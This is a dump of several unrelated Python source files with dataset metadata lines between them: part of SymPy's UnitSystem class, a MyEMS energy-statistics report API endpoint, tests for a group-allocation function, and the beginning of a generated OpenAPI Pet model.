self._base_units = tuple(base_units)
super().__init__()
def __str__(self):
"""
Return the name of the system.
If it does not exist, then it makes a list of symbols (or names) of
the base dimensions.
"""
if self.name != "":
return self.name
else:
return "UnitSystem((%s))" % ", ".join(
str(d) for d in self._base_units)
def __repr__(self):
return '<UnitSystem: %s>' % repr(self._base_units)
def extend(self, base, units=(), name="", description="", dimension_system=None):
"""Extend the current system into a new one.
Take the base and normal units of the current system to merge
them to the base and normal units given in argument.
If not provided, name and description are overridden by empty strings.
"""
base = self._base_units + tuple(base)
units = self._units + tuple(units)
return UnitSystem(base, units, name, description, dimension_system)
def print_unit_base(self, unit):
"""
Useless method.
DO NOT USE, use instead ``convert_to``.
Give the string expression of a unit in term of the basis.
Units are displayed by decreasing power.
"""
SymPyDeprecationWarning(
deprecated_since_version="1.2",
issue=13336,
feature="print_unit_base",
useinstead="convert_to",
).warn()
from sympy.physics.units import convert_to
return convert_to(unit, self._base_units)
def get_dimension_system(self):
return self._dimension_system
def get_quantity_dimension(self, unit):
qdm = self.get_dimension_system()._quantity_dimension_map
if unit in qdm:
return qdm[unit]
return super().get_quantity_dimension(unit)
def get_quantity_scale_factor(self, unit):
qsfm = self.get_dimension_system()._quantity_scale_factors
if unit in qsfm:
return qsfm[unit]
return super().get_quantity_scale_factor(unit)
@staticmethod
def get_unit_system(unit_system):
if isinstance(unit_system, UnitSystem):
return unit_system
if unit_system not in UnitSystem._unit_systems:
raise ValueError(
"Unit system is not supported. Currently"
"supported unit systems are {}".format(
", ".join(sorted(UnitSystem._unit_systems))
)
)
return UnitSystem._unit_systems[unit_system]
@staticmethod
def get_default_unit_system():
return UnitSystem._unit_systems["SI"]
@property
def dim(self):
"""
Give the dimension of the system.
That is return the number of units forming the basis.
"""
return len(self._base_units)
@property
def is_consistent(self):
"""
Check if the underlying dimension system is consistent.
"""
# test is performed in DimensionSystem
return self.get_dimension_system().is_consistent
def get_dimensional_expr(self, expr):
from sympy import Mul, Add, Pow, Derivative
from sympy import Function
from sympy.physics.units import Quantity
if isinstance(expr, Mul):
return Mul(*[self.get_dimensional_expr(i) for i in expr.args])
elif isinstance(expr, Pow):
return self.get_dimensional_expr(expr.base) ** expr.exp
elif isinstance(expr, Add):
return self.get_dimensional_expr(expr.args[0])
elif isinstance(expr, Derivative):
dim = self.get_dimensional_expr(expr.expr)
for independent, count in expr.variable_count:
dim /= self.get_dimensional_expr(independent)**count
return dim
elif isinstance(expr, Function):
args = [self.get_dimensional_expr(arg) for arg in expr.args]
if all(i == 1 for i in args):
return S.One
return expr.func(*args)
elif isinstance(expr, Quantity):
return self.get_quantity_dimension(expr).name
return S.One
def _collect_factor_and_dimension(self, expr):
"""
Return tuple with scale factor expression and dimension expression.
"""
from sympy.physics.units import Quantity
if isinstance(expr, Quantity):
return expr.scale_factor, expr.dimension
elif isinstance(expr, Mul):
factor = 1
dimension = Dimension(1)
for arg in expr.args:
arg_factor, arg_dim = self._collect_factor_and_dimension(arg)
factor *= arg_factor
dimension *= arg_dim
return factor, dimension
elif isinstance(expr, Pow):
factor, dim = self._collect_factor_and_dimension(expr.base)
exp_factor, exp_dim = self._collect_factor_and_dimension(expr.exp)
if exp_dim.is_dimensionless:
exp_dim = 1
return factor ** exp_factor, dim ** (exp_factor * exp_dim)
elif isinstance(expr, Add):
factor, dim = self._collect_factor_and_dimension(expr.args[0])
for addend in expr.args[1:]:
addend_factor, addend_dim = \
self._collect_factor_and_dimension(addend)
if dim != addend_dim:
raise ValueError(
'Dimension of "{}" is {}, '
'but it should be {}'.format(
addend, addend_dim, dim))
factor += addend_factor
return factor, dim
elif isinstance(expr, Derivative):
factor, dim = self._collect_factor_and_dimension(expr.args[0])
for independent, count in expr.variable_count:
ifactor, idim = self._collect_factor_and_dimension(independent)
factor /= ifactor**count
dim /= idim**count
return factor, dim
elif isinstance(expr, Function):
fds = [self._collect_factor_and_dimension(
arg) for arg in expr.args]
return (expr.func(*(f[0] for f in fds)),
expr.func(*(d[1] for d in fds)))
elif isinstance(expr, Dimension):
return 1, expr
else:
return expr, Dimension(1)
| 34.827103
| 87
| 0.60687
|
1a34f03bbba8df71b7cea655adbb586f11244888
| 37,333
|
py
|
Python
|
myems-api/reports/spacestatistics.py
|
hyh123a/myems
|
669ab8554995a622da595384698d670f9cee61f8
|
[
"MIT"
] | 1
|
2021-08-04T13:41:45.000Z
|
2021-08-04T13:41:45.000Z
|
myems-api/reports/spacestatistics.py
|
hyh123a/myems
|
669ab8554995a622da595384698d670f9cee61f8
|
[
"MIT"
] | null | null | null |
myems-api/reports/spacestatistics.py
|
hyh123a/myems
|
669ab8554995a622da595384698d670f9cee61f8
|
[
"MIT"
] | null | null | null |
import falcon
import simplejson as json
import mysql.connector
import config
from datetime import datetime, timedelta, timezone
from core import utilities
from decimal import Decimal
import excelexporters.spacestatistics
class Reporting:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
####################################################################################################################
# PROCEDURES
# Step 1: valid parameters
# Step 2: query the space
# Step 3: query energy categories
# Step 4: query associated sensors
# Step 5: query associated points
# Step 6: query base period energy input
# Step 7: query reporting period energy input
# Step 8: query tariff data
# Step 9: query associated sensors and points data
# Step 10: construct the report
####################################################################################################################
@staticmethod
def on_get(req, resp):
print(req.params)
space_id = req.params.get('spaceid')
period_type = req.params.get('periodtype')
base_start_datetime_local = req.params.get('baseperiodstartdatetime')
base_end_datetime_local = req.params.get('baseperiodenddatetime')
reporting_start_datetime_local = req.params.get('reportingperiodstartdatetime')
reporting_end_datetime_local = req.params.get('reportingperiodenddatetime')
################################################################################################################
# Step 1: valid parameters
################################################################################################################
if space_id is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_SPACE_ID')
else:
space_id = str.strip(space_id)
if not space_id.isdigit() or int(space_id) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_SPACE_ID')
if period_type is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_PERIOD_TYPE')
else:
period_type = str.strip(period_type)
if period_type not in ['hourly', 'daily', 'monthly', 'yearly']:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST', description='API.INVALID_PERIOD_TYPE')
timezone_offset = int(config.utc_offset[1:3]) * 60 + int(config.utc_offset[4:6])
if config.utc_offset[0] == '-':
timezone_offset = -timezone_offset
base_start_datetime_utc = None
if base_start_datetime_local is not None and len(str.strip(base_start_datetime_local)) > 0:
base_start_datetime_local = str.strip(base_start_datetime_local)
try:
base_start_datetime_utc = datetime.strptime(base_start_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_BASE_PERIOD_START_DATETIME")
base_end_datetime_utc = None
if base_end_datetime_local is not None and len(str.strip(base_end_datetime_local)) > 0:
base_end_datetime_local = str.strip(base_end_datetime_local)
try:
base_end_datetime_utc = datetime.strptime(base_end_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_BASE_PERIOD_END_DATETIME")
if base_start_datetime_utc is not None and base_end_datetime_utc is not None and \
base_start_datetime_utc >= base_end_datetime_utc:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_BASE_PERIOD_END_DATETIME')
if reporting_start_datetime_local is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_START_DATETIME")
else:
reporting_start_datetime_local = str.strip(reporting_start_datetime_local)
try:
reporting_start_datetime_utc = datetime.strptime(reporting_start_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_START_DATETIME")
if reporting_end_datetime_local is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_END_DATETIME")
else:
reporting_end_datetime_local = str.strip(reporting_end_datetime_local)
try:
reporting_end_datetime_utc = datetime.strptime(reporting_end_datetime_local,
'%Y-%m-%dT%H:%M:%S').replace(tzinfo=timezone.utc) - \
timedelta(minutes=timezone_offset)
except ValueError:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description="API.INVALID_REPORTING_PERIOD_END_DATETIME")
if reporting_start_datetime_utc >= reporting_end_datetime_utc:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_REPORTING_PERIOD_END_DATETIME')
################################################################################################################
# Step 2: query the space
################################################################################################################
cnx_system = mysql.connector.connect(**config.myems_system_db)
cursor_system = cnx_system.cursor()
cnx_energy = mysql.connector.connect(**config.myems_energy_db)
cursor_energy = cnx_energy.cursor()
cnx_historical = mysql.connector.connect(**config.myems_historical_db)
cursor_historical = cnx_historical.cursor()
cursor_system.execute(" SELECT id, name, area, cost_center_id "
" FROM tbl_spaces "
" WHERE id = %s ", (space_id,))
row_space = cursor_system.fetchone()
if row_space is None:
if cursor_system:
cursor_system.close()
if cnx_system:
cnx_system.disconnect()
if cursor_energy:
cursor_energy.close()
if cnx_energy:
cnx_energy.disconnect()
if cnx_historical:
cnx_historical.close()
if cursor_historical:
cursor_historical.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND', description='API.SPACE_NOT_FOUND')
space = dict()
space['id'] = row_space[0]
space['name'] = row_space[1]
space['area'] = row_space[2]
space['cost_center_id'] = row_space[3]
################################################################################################################
# Step 3: query energy categories
################################################################################################################
energy_category_set = set()
# query energy categories in base period
cursor_energy.execute(" SELECT DISTINCT(energy_category_id) "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s ",
(space['id'], base_start_datetime_utc, base_end_datetime_utc))
rows_energy_categories = cursor_energy.fetchall()
if rows_energy_categories is not None or len(rows_energy_categories) > 0:
for row_energy_category in rows_energy_categories:
energy_category_set.add(row_energy_category[0])
# query energy categories in reporting period
cursor_energy.execute(" SELECT DISTINCT(energy_category_id) "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s ",
(space['id'], reporting_start_datetime_utc, reporting_end_datetime_utc))
rows_energy_categories = cursor_energy.fetchall()
if rows_energy_categories is not None or len(rows_energy_categories) > 0:
for row_energy_category in rows_energy_categories:
energy_category_set.add(row_energy_category[0])
# query all energy categories in base period and reporting period
cursor_system.execute(" SELECT id, name, unit_of_measure, kgce, kgco2e "
" FROM tbl_energy_categories "
" ORDER BY id ", )
rows_energy_categories = cursor_system.fetchall()
if rows_energy_categories is None or len(rows_energy_categories) == 0:
if cursor_system:
cursor_system.close()
if cnx_system:
cnx_system.disconnect()
if cursor_energy:
cursor_energy.close()
if cnx_energy:
cnx_energy.disconnect()
if cnx_historical:
cnx_historical.close()
if cursor_historical:
cursor_historical.disconnect()
raise falcon.HTTPError(falcon.HTTP_404,
title='API.NOT_FOUND',
description='API.ENERGY_CATEGORY_NOT_FOUND')
energy_category_dict = dict()
for row_energy_category in rows_energy_categories:
if row_energy_category[0] in energy_category_set:
energy_category_dict[row_energy_category[0]] = {"name": row_energy_category[1],
"unit_of_measure": row_energy_category[2],
"kgce": row_energy_category[3],
"kgco2e": row_energy_category[4]}
################################################################################################################
# Step 4: query associated sensors
################################################################################################################
point_list = list()
cursor_system.execute(" SELECT po.id, po.name, po.units, po.object_type "
" FROM tbl_spaces sp, tbl_sensors se, tbl_spaces_sensors spse, "
" tbl_points po, tbl_sensors_points sepo "
" WHERE sp.id = %s AND sp.id = spse.space_id AND spse.sensor_id = se.id "
" AND se.id = sepo.sensor_id AND sepo.point_id = po.id "
" ORDER BY po.id ", (space['id'], ))
rows_points = cursor_system.fetchall()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_list.append({"id": row[0], "name": row[1], "units": row[2], "object_type": row[3]})
################################################################################################################
# Step 5: query associated points
################################################################################################################
cursor_system.execute(" SELECT po.id, po.name, po.units, po.object_type "
" FROM tbl_spaces sp, tbl_spaces_points sppo, tbl_points po "
" WHERE sp.id = %s AND sp.id = sppo.space_id AND sppo.point_id = po.id "
" ORDER BY po.id ", (space['id'], ))
rows_points = cursor_system.fetchall()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_list.append({"id": row[0], "name": row[1], "units": row[2], "object_type": row[3]})
################################################################################################################
# Step 6: query base period energy input
################################################################################################################
base = dict()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
base[energy_category_id] = dict()
base[energy_category_id]['timestamps'] = list()
base[energy_category_id]['values'] = list()
base[energy_category_id]['subtotal'] = Decimal(0.0)
base[energy_category_id]['mean'] = None
base[energy_category_id]['median'] = None
base[energy_category_id]['minimum'] = None
base[energy_category_id]['maximum'] = None
base[energy_category_id]['stdev'] = None
base[energy_category_id]['variance'] = None
cursor_energy.execute(" SELECT start_datetime_utc, actual_value "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND energy_category_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s "
" ORDER BY start_datetime_utc ",
(space['id'],
energy_category_id,
base_start_datetime_utc,
base_end_datetime_utc))
rows_space_hourly = cursor_energy.fetchall()
rows_space_periodically, \
base[energy_category_id]['mean'], \
base[energy_category_id]['median'], \
base[energy_category_id]['minimum'], \
base[energy_category_id]['maximum'], \
base[energy_category_id]['stdev'], \
base[energy_category_id]['variance'] = \
utilities.statistics_hourly_data_by_period(rows_space_hourly,
base_start_datetime_utc,
base_end_datetime_utc,
period_type)
for row_space_periodically in rows_space_periodically:
current_datetime_local = row_space_periodically[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
if period_type == 'hourly':
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
elif period_type == 'daily':
current_datetime = current_datetime_local.strftime('%Y-%m-%d')
elif period_type == 'monthly':
current_datetime = current_datetime_local.strftime('%Y-%m')
elif period_type == 'yearly':
current_datetime = current_datetime_local.strftime('%Y')
actual_value = Decimal(0.0) if row_space_periodically[1] is None else row_space_periodically[1]
base[energy_category_id]['timestamps'].append(current_datetime)
base[energy_category_id]['values'].append(actual_value)
base[energy_category_id]['subtotal'] += actual_value
################################################################################################################
# Step 7: query reporting period energy input
################################################################################################################
reporting = dict()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
reporting[energy_category_id] = dict()
reporting[energy_category_id]['timestamps'] = list()
reporting[energy_category_id]['values'] = list()
reporting[energy_category_id]['subtotal'] = Decimal(0.0)
reporting[energy_category_id]['mean'] = None
reporting[energy_category_id]['median'] = None
reporting[energy_category_id]['minimum'] = None
reporting[energy_category_id]['maximum'] = None
reporting[energy_category_id]['stdev'] = None
reporting[energy_category_id]['variance'] = None
cursor_energy.execute(" SELECT start_datetime_utc, actual_value "
" FROM tbl_space_input_category_hourly "
" WHERE space_id = %s "
" AND energy_category_id = %s "
" AND start_datetime_utc >= %s "
" AND start_datetime_utc < %s "
" ORDER BY start_datetime_utc ",
(space['id'],
energy_category_id,
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows_space_hourly = cursor_energy.fetchall()
rows_space_periodically, \
reporting[energy_category_id]['mean'], \
reporting[energy_category_id]['median'], \
reporting[energy_category_id]['minimum'], \
reporting[energy_category_id]['maximum'], \
reporting[energy_category_id]['stdev'], \
reporting[energy_category_id]['variance'] = \
utilities.statistics_hourly_data_by_period(rows_space_hourly,
reporting_start_datetime_utc,
reporting_end_datetime_utc,
period_type)
for row_space_periodically in rows_space_periodically:
current_datetime_local = row_space_periodically[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
if period_type == 'hourly':
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
elif period_type == 'daily':
current_datetime = current_datetime_local.strftime('%Y-%m-%d')
elif period_type == 'monthly':
current_datetime = current_datetime_local.strftime('%Y-%m')
elif period_type == 'yearly':
current_datetime = current_datetime_local.strftime('%Y')
actual_value = Decimal(0.0) if row_space_periodically[1] is None else row_space_periodically[1]
reporting[energy_category_id]['timestamps'].append(current_datetime)
reporting[energy_category_id]['values'].append(actual_value)
reporting[energy_category_id]['subtotal'] += actual_value
################################################################################################################
# Step 8: query tariff data
################################################################################################################
parameters_data = dict()
parameters_data['names'] = list()
parameters_data['timestamps'] = list()
parameters_data['values'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
energy_category_tariff_dict = utilities.get_energy_category_tariffs(space['cost_center_id'],
energy_category_id,
reporting_start_datetime_utc,
reporting_end_datetime_utc)
tariff_timestamp_list = list()
tariff_value_list = list()
for k, v in energy_category_tariff_dict.items():
# convert k from utc to local
k = k + timedelta(minutes=timezone_offset)
tariff_timestamp_list.append(k.isoformat()[0:19][0:19])
tariff_value_list.append(v)
parameters_data['names'].append('TARIFF-' + energy_category_dict[energy_category_id]['name'])
parameters_data['timestamps'].append(tariff_timestamp_list)
parameters_data['values'].append(tariff_value_list)
################################################################################################################
# Step 9: query associated sensors and points data
################################################################################################################
for point in point_list:
point_values = []
point_timestamps = []
if point['object_type'] == 'ANALOG_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_analog_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s "
" ORDER BY utc_date_time ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
elif point['object_type'] == 'ENERGY_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_energy_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s "
" ORDER BY utc_date_time ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
elif point['object_type'] == 'DIGITAL_VALUE':
query = (" SELECT utc_date_time, actual_value "
" FROM tbl_digital_value "
" WHERE point_id = %s "
" AND utc_date_time BETWEEN %s AND %s ")
cursor_historical.execute(query, (point['id'],
reporting_start_datetime_utc,
reporting_end_datetime_utc))
rows = cursor_historical.fetchall()
if rows is not None and len(rows) > 0:
for row in rows:
current_datetime_local = row[0].replace(tzinfo=timezone.utc) + \
timedelta(minutes=timezone_offset)
current_datetime = current_datetime_local.strftime('%Y-%m-%dT%H:%M:%S')
point_timestamps.append(current_datetime)
point_values.append(row[1])
parameters_data['names'].append(point['name'] + ' (' + point['units'] + ')')
parameters_data['timestamps'].append(point_timestamps)
parameters_data['values'].append(point_values)
################################################################################################################
# Step 10: construct the report
################################################################################################################
if cursor_system:
cursor_system.close()
if cnx_system:
cnx_system.disconnect()
if cursor_energy:
cursor_energy.close()
if cnx_energy:
cnx_energy.disconnect()
result = dict()
result['space'] = dict()
result['space']['name'] = space['name']
result['space']['area'] = space['area']
result['base_period'] = dict()
result['base_period']['names'] = list()
result['base_period']['units'] = list()
result['base_period']['timestamps'] = list()
result['base_period']['values'] = list()
result['base_period']['subtotals'] = list()
result['base_period']['means'] = list()
result['base_period']['medians'] = list()
result['base_period']['minimums'] = list()
result['base_period']['maximums'] = list()
result['base_period']['stdevs'] = list()
result['base_period']['variances'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
result['base_period']['names'].append(energy_category_dict[energy_category_id]['name'])
result['base_period']['units'].append(energy_category_dict[energy_category_id]['unit_of_measure'])
result['base_period']['timestamps'].append(base[energy_category_id]['timestamps'])
result['base_period']['values'].append(base[energy_category_id]['values'])
result['base_period']['subtotals'].append(base[energy_category_id]['subtotal'])
result['base_period']['means'].append(base[energy_category_id]['mean'])
result['base_period']['medians'].append(base[energy_category_id]['median'])
result['base_period']['minimums'].append(base[energy_category_id]['minimum'])
result['base_period']['maximums'].append(base[energy_category_id]['maximum'])
result['base_period']['stdevs'].append(base[energy_category_id]['stdev'])
result['base_period']['variances'].append(base[energy_category_id]['variance'])
result['reporting_period'] = dict()
result['reporting_period']['names'] = list()
result['reporting_period']['energy_category_ids'] = list()
result['reporting_period']['units'] = list()
result['reporting_period']['timestamps'] = list()
result['reporting_period']['values'] = list()
result['reporting_period']['subtotals'] = list()
result['reporting_period']['means'] = list()
result['reporting_period']['means_per_unit_area'] = list()
result['reporting_period']['means_increment_rate'] = list()
result['reporting_period']['medians'] = list()
result['reporting_period']['medians_per_unit_area'] = list()
result['reporting_period']['medians_increment_rate'] = list()
result['reporting_period']['minimums'] = list()
result['reporting_period']['minimums_per_unit_area'] = list()
result['reporting_period']['minimums_increment_rate'] = list()
result['reporting_period']['maximums'] = list()
result['reporting_period']['maximums_per_unit_area'] = list()
result['reporting_period']['maximums_increment_rate'] = list()
result['reporting_period']['stdevs'] = list()
result['reporting_period']['stdevs_per_unit_area'] = list()
result['reporting_period']['stdevs_increment_rate'] = list()
result['reporting_period']['variances'] = list()
result['reporting_period']['variances_per_unit_area'] = list()
result['reporting_period']['variances_increment_rate'] = list()
if energy_category_set is not None and len(energy_category_set) > 0:
for energy_category_id in energy_category_set:
result['reporting_period']['names'].append(energy_category_dict[energy_category_id]['name'])
result['reporting_period']['energy_category_ids'].append(energy_category_id)
result['reporting_period']['units'].append(energy_category_dict[energy_category_id]['unit_of_measure'])
result['reporting_period']['timestamps'].append(reporting[energy_category_id]['timestamps'])
result['reporting_period']['values'].append(reporting[energy_category_id]['values'])
result['reporting_period']['subtotals'].append(reporting[energy_category_id]['subtotal'])
result['reporting_period']['means'].append(reporting[energy_category_id]['mean'])
result['reporting_period']['means_per_unit_area'].append(
reporting[energy_category_id]['mean'] / space['area']
if reporting[energy_category_id]['mean'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['means_increment_rate'].append(
(reporting[energy_category_id]['mean'] - base[energy_category_id]['mean']) /
base[energy_category_id]['mean'] if (base[energy_category_id]['mean'] is not None and
base[energy_category_id]['mean'] > Decimal(0.0))
else None)
result['reporting_period']['medians'].append(reporting[energy_category_id]['median'])
result['reporting_period']['medians_per_unit_area'].append(
reporting[energy_category_id]['median'] / space['area']
if reporting[energy_category_id]['median'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['medians_increment_rate'].append(
(reporting[energy_category_id]['median'] - base[energy_category_id]['median']) /
base[energy_category_id]['median'] if (base[energy_category_id]['median'] is not None and
base[energy_category_id]['median'] > Decimal(0.0))
else None)
result['reporting_period']['minimums'].append(reporting[energy_category_id]['minimum'])
result['reporting_period']['minimums_per_unit_area'].append(
reporting[energy_category_id]['minimum'] / space['area']
if reporting[energy_category_id]['minimum'] is not None and
space['area'] is not None and space['area'] > Decimal(0.0)
else None)
result['reporting_period']['minimums_increment_rate'].append(
(reporting[energy_category_id]['minimum'] - base[energy_category_id]['minimum']) /
base[energy_category_id]['minimum'] if (base[energy_category_id]['minimum'] is not None and
base[energy_category_id]['minimum'] > Decimal(0.0))
else None)
result['reporting_period']['maximums'].append(reporting[energy_category_id]['maximum'])
result['reporting_period']['maximums_per_unit_area'].append(
reporting[energy_category_id]['maximum'] / space['area']
if reporting[energy_category_id]['maximum'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['maximums_increment_rate'].append(
(reporting[energy_category_id]['maximum'] - base[energy_category_id]['maximum']) /
base[energy_category_id]['maximum']
if (base[energy_category_id]['maximum'] is not None and
base[energy_category_id]['maximum'] > Decimal(0.0))
else None)
result['reporting_period']['stdevs'].append(reporting[energy_category_id]['stdev'])
result['reporting_period']['stdevs_per_unit_area'].append(
reporting[energy_category_id]['stdev'] / space['area']
if reporting[energy_category_id]['stdev'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['stdevs_increment_rate'].append(
(reporting[energy_category_id]['stdev'] - base[energy_category_id]['stdev']) /
base[energy_category_id]['stdev'] if (base[energy_category_id]['stdev'] is not None and
base[energy_category_id]['stdev'] > Decimal(0.0))
else None)
result['reporting_period']['variances'].append(reporting[energy_category_id]['variance'])
result['reporting_period']['variances_per_unit_area'].append(
reporting[energy_category_id]['variance'] / space['area']
if reporting[energy_category_id]['variance'] is not None and
space['area'] is not None and
space['area'] > Decimal(0.0)
else None)
result['reporting_period']['variances_increment_rate'].append(
(reporting[energy_category_id]['variance'] - base[energy_category_id]['variance']) /
base[energy_category_id]['variance'] if (base[energy_category_id]['variance'] is not None and
base[energy_category_id]['variance'] > Decimal(0.0))
else None)
result['parameters'] = {
"names": parameters_data['names'],
"timestamps": parameters_data['timestamps'],
"values": parameters_data['values']
}
# export result to Excel file and then encode the file to base64 string
result['excel_bytes_base64'] = excelexporters.spacestatistics.export(result,
space['name'],
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type)
resp.body = json.dumps(result)
| 60.214516
| 120
| 0.510487
|
014a34337ccfefe2296a9ec71bfe9d241db10119
| 1,510
|
py
|
Python
|
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | 8
|
2019-08-29T07:43:03.000Z
|
2021-03-03T14:25:09.000Z
|
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | null | null | null |
gumi/group_utils_test.py
|
kumasento/gconv-prune
|
f81c417d3754102c902bd153809130e12607bd7d
|
[
"MIT"
] | 2
|
2019-09-15T03:39:30.000Z
|
2020-04-30T07:06:46.000Z
|
import torch
from gumi.group_utils import get_group_allocation
def test_get_group_allocation_all_ones():
mask = torch.ones((2, 2), dtype=torch.bool)
gaf, gac = get_group_allocation(mask, G=1)
assert gaf is not None
assert gac is not None
assert (gaf == 1).all()
assert (gac == 1).all()
# Cannot split into valid groups in this case.
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is None
assert gac is None
def test_get_group_allocation_block_diagonal():
mask = torch.ones((4, 4), dtype=torch.bool)
mask[2:, :2] = 0
mask[:2, 2:] = 0
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf[:2] == 1).all()
assert (gaf[2:] == 2).all()
assert (gac[:2] == 1).all()
assert (gac[2:] == 2).all()
# anti-diagonal
mask = torch.ones((4, 4), dtype=torch.bool)
mask[:2, :2] = 0
mask[2:, 2:] = 0
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf[:2] == 2).all()
assert (gaf[2:] == 1).all()
assert (gac[:2] == 1).all()
assert (gac[2:] == 2).all()
def test_get_group_allocation_scattered():
mask = torch.tensor(
[[0, 1, 0, 1], [1, 0, 1, 0], [0, 1, 0, 1], [1, 0, 1, 0],], dtype=torch.bool
)
gaf, gac = get_group_allocation(mask, G=2)
assert gaf is not None
assert gac is not None
assert (gaf == [2, 1, 2, 1]).all()
assert (gac == [1, 2, 1, 2]).all()
| 26.034483
| 83
| 0.586755
|
c93acd53c96c31681f115b251b0c4df8c708da5e
| 7,867
|
py
|
Python
|
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
samples/openapi3/client/petstore/python-experimental/petstore_api/models/pet.py
|
gmcouto/openapi-generator
|
bde0d77c8f3f9ae831690beecfb0c4e70f37e7b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from petstore_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from petstore_api.models import category
except ImportError:
category = sys.modules[
'petstore_api.models.category']
try:
from petstore_api.models import tag
except ImportError:
tag = sys.modules[
'petstore_api.models.tag']
class Pet(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
